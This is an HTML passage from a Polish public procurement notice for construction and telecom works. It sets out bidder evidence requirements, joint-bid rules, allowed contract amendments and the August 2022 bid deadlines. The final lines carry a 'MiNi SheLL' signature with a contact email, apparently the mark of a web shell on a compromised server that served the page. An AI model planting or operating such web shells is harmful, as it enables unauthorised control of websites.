class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy, którego oferta została<br/>najwyżej oceniona obejmują:<br/>4.1 Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt. 1,<br/>4.2 Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>4.3. Wykonawca, który jest firmą budowlaną przedstawia wykaz robót budowlanych wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości przedmiotu(co najmniej 150000,00 zł), dat wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane lub są wykonywane, oraz załączeniem dowodów<br/>określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonywane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy: w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy - zgodnie z załącznikiem nr 7a do SWZ. Wykonawca, który jest operatorem telekomunikacyjnym przedstawia oświadczenie w którym oświadcza, że prowadzi nieprzerwanie działalność<br/>telekomunikacyjną przez 5 lat przed upływem terminu składania ofert i przedstawia Zamawiającemu aktywny wpis/zaświadczenie do rejestru przedsiębiorców telekomunikacyjnych prowadzony przez Prezesa Urzędu Komunikacji Elektronicznej,<br/>wydane na podstawie art.11 w zw. z art.10 ustawy z dnia 16 lipca 2004r. – Prawo telekomunikacyjne (tekst jedn. Dz. U. z 2017r., poz.1907), wzór oświadczenia stanowi załącznik nr 7b do SWZ.<br/>Okresy wyrażone w latach lub miesiącach liczy się wstecz od dnia, w którym upływa termin składania ofert. Dowody należy złożyć w oryginale lub kopii potwierdzonej za zgodność z oryginałem. W przypadku powołania się przez wykonawcę na doświadczenie w realizacji robót budowlanych wykonanych wspólnie z innymi<br/>wykonawcami, wykaz dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>4.4. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności co najmniej 1 osobę, która pełnić będzie funkcję kierownika budowy lub kierownika robót, posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie<br/>kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji elektrycznych, elektroenergetycznych lub w zakresie sieci, instalacji i urządzeń<br/>telekomunikacyjnych bez ograniczeń lub ważne uprawnienia im odpowiadające, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa. Wykaz będzie zawierać informacje na temat ich kwalifikacji zawodowych, rodzaju uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez osobę czynności z informacją o podstawie do dysponowania tymi osobami – zgodnie z załącznikiem nr 8 do SWZ.<br/>4.5 Polisa, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200.000,00 PLN (słownie: dwieście tysięcy złotych).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przez Wykonawcę przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna:<br/>12.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do Oferty.<br/>12.2 Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>12.3 W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenie, o którym mowa w Rozdziale VIII pkt .1 SWZ, składa każdy<br/>z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>12.4 Zamawiający w stosunku do wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej<br/>lub zawodowej – dopuszcza łączne spełnienie warunków przez Wykonawców.<br/>12.5 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które roboty lub usługi wykonają poszczególni<br/>Wykonawcy (zgodnie z załącznikiem nr 6 do SWZ).<br/>Strona 16 z 31<br/>12.6 Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem<br/>występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>12.7 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą<br/>solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia<br/>należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany i uzupełnienia niniejszej Umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności.<br/>2.	Strony dopuszczają możliwość zmiany postanowień Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w następujących przypadkach:<br/>1)	przejścia na następców prawnych praw i obowiązków Wykonawcy, w tym wynikających z niniejszej Umowy, na podstawie pisemnego wniosku Wykonawcy, który wymaga akceptacji Zamawiającego, z tym zastrzeżeniem, iż zmiana Umowy w takim przypadku dotyczy tylko zmiany oznaczenia Wykonawcy z zachowaniem pozostałych postanowień Umowy,<br/>2)	zmiany w oznaczeniu firmy (nazwy) Wykonawcy oraz zmiany adresu (siedziby) Wykonawcy na podstawie pisemnego wniosku Wykonawcy, z tym zastrzeżeniem, iż zmiana Umowy w takim przypadku dotyczy tylko zmiany oznaczenia lub adresu (siedziby) Wykonawcy z zachowaniem pozostałych postanowień Umowy;<br/>3.	Dopuszcza się zmiany w niniejszej umowie:<br/>1) dot. powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego,<br/>2)	W przypadku wystąpienia siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony Umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałych na skutek działania siły wyższej.<br/>3)	Dot. zmiany terminu rozpoczęcia prac budowlanych i/lub ich zakończenia, jeżeli z przyczyn leżących po stronie Zamawiającego ich rozpoczęcie lub zakończenie w wyznaczonym terminie było niemożliwe.<br/>4)	Dot. zmiany terminu realizacji przedmiotu zamówienia, w przypadku zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub spełnienie wymogów technologicznych, udokumentowanych; klęski żywiołowe, przerwy w dostawie prądu lub wody, trwającej ponad 7 dni,<br/>5)	konieczności wykonania dodatkowych badań i ekspertyz,<br/>4.	Zamawiający przewiduje również możliwość wprowadzenia zmian do treści zawartej umowy w okolicznościach i przypadkach określonych w art. 455 ust. 1 pkt 1 i 4 oraz art. 455 ust. 2 ustawy Pzp. Wykonawca zgłasza się z wnioskiem do Zamawiającego o zmianę umowy uzasadniając wynikłą konieczność zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzp.kans.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-22 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com